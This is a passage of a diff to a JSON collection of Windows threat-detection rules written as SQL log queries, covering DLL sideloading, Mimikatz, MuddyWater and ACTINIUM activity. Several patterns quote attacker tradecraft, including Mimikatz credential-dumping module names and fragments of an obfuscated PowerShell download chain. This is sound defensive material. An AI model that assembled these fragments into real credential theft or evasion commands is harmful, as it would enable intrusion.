'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_aruba_networks_virtual_intranet_access.yml" + "filename": "proc_creation_win_wusa_cab_files_extraction_from_susp_paths.yml" }, { - "title": "Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded", - "id": "bdc64095-d59a-42a2-8588-71fd9c9d9abc", + "title": "Potential PowerShell Obfuscation Via WCHAR", + "id": "e312efd0-35a1-407f-8439-b8d434b438a6", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects suspicious encoded character syntax often used for defense evasion", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND Signed = 'false')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%(WCHAR)0x%' ESCAPE '\\')" ], - "filename": "image_load_dll_dbghelp_dbgcore_unsigned_load.yml" + "filename": "proc_creation_win_powershell_obfuscation_via_utf8.yml" }, { - "title": "DLL Load By System Process From Suspicious Locations", - "id": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", + "title": "Potential Signing Bypass Via Windows Developer Features", + "id": "a383dec4-deec-4e6e-913b-ed9249670848", "status": "experimental", - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", + "description": "Detects when a user enable developer features such as \"Developer Mode\" or \"Application Sideloading\". Which allows the user to install untrusted packages.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\rundll32.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\setup.exe%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "image_load_susp_dll_load_system_process.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "Wmiprvse Wbemcomn DLL Hijack", - "id": "7707a579-e0d8-4886-a853-ce47e4575aaa", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network and loading it for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "image_load_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Suspicious Volume Shadow Copy VSS_PS.dll Load", - "id": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "status": "experimental", - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "author": "Markus Neis, @markus_neis", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", + "status": "test", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", + "status": "test", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "Unlikely" + "Administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", + "status": "test", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "author": "Markus Neis", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", + "status": "experimental", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1036", + "attack.t1218" ], "falsepositives": [ - "Very likely, needs more tuning" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.lateral_movement", - "attack.g0047", - "attack.t1021.005" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-autoreconnect %' ESCAPE '\\' AND CommandLine LIKE '%-connect %' ESCAPE '\\' AND CommandLine LIKE '%-id:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ultravnc_susp_execution.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Suspicious File Execution From Internet Hosted WebDav Share", - "id": "f0507c0f-a3a2-40f5-acc6-7f543c334993", - "status": "experimental", - "description": "Detects the execution of the \"net use\" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files", - "author": "pH-T (Nextron Systems)", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", + "status": "test", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cmd.exe%' ESCAPE '\\' OR OriginalFileName = 'Cmd.EXE') AND (CommandLine LIKE '% net use http%' ESCAPE '\\' AND CommandLine LIKE '%& start /b %' ESCAPE '\\' AND CommandLine LIKE '%\\\\DavWWWRoot\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.exe %' ESCAPE '\\' OR CommandLine LIKE '%.dll %' ESCAPE '\\' OR CommandLine LIKE '%.bat %' ESCAPE '\\' OR CommandLine LIKE '%.vbs %' ESCAPE '\\' OR CommandLine LIKE '%.ps1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND (CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_net_use_and_exec_combo.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "Renamed PAExec Execution", - "id": "c4e49831-1496-40cf-8ce1-b53f942b02f9", - "status": "test", - "description": "Detects execution of renamed version of PAExec. Often used by attackers", - "author": "Florian Roth (Nextron Systems), Jason Lynch", + "title": "Mshtml DLL RunHTMLApplication Abuse", + "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", + "status": "experimental", + "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + }, + { + "title": "CMSTP Execution Process Creation", + "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ "attack.defense_evasion", - "attack.t1202" + "attack.execution", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing", - "When executed with the \"-s\" flag. PAExec will copy itself to the \"C:\\Windows\\\" directory with a different name. Usually like this \"PAExec-[XXXXX]-[ComputerName]\"" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'PAExec Application' OR OriginalFileName = 'PAExec.exe' OR Product LIKE '%PAExec%' ESCAPE '\\' OR Imphash IN ('11D40A7B7876288F919AB819CC2D9802', '6444f8a34e99b8f7d9647de66aabe516', 'dfd6aa3f7b2b1035b76b718f1ddc689f', '1a6cca4d5460b1710a12dea39e4a592c') OR (Hashes LIKE '%IMPHASH=11D40A7B7876288F919AB819CC2D9802%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6444f8a34e99b8f7d9647de66aabe516%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=1a6cca4d5460b1710a12dea39e4a592c%' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\paexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_renamed_paexec.yml" + "filename": "proc_creation_win_cmstp_execution_by_creation.yml" }, { - "title": "PUA - Radmin Viewer Utility Execution", - "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "title": "ZOHO Dctask64 Process Injection", + "id": "6345b048-8441-43a7-9bed-541133633d7a", "status": "test", - "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", - "author": "frack113", + "description": "Detects suspicious process injection using ZOHO's dctask64.exe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.lateral_movement", - "attack.t1072" + "attack.defense_evasion", + "attack.t1055.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\' AND NOT (CommandLine LIKE '%DesktopCentral\\_Agent\\\\agent%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_radmin.yml" + "filename": "proc_creation_win_lolbin_dctask64_proc_inject.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Execution", - "id": "93bbde78-dc86-4e73-9ffc-ff8a384ca89c", + "title": "Suspicious Add Scheduled Command Pattern", + "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", "status": "experimental", - "description": "Detects execution of known compromised version of 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious scheduled task creations with commands that are uncommon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Legitimate usage of 3CXDesktopApp" + "Software installers that run from temporary folders and also install scheduled tasks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((OriginalFileName = '3CXDesktopApp.exe' OR NewProcessName LIKE '%\\\\3CXDesktopApp.exe' 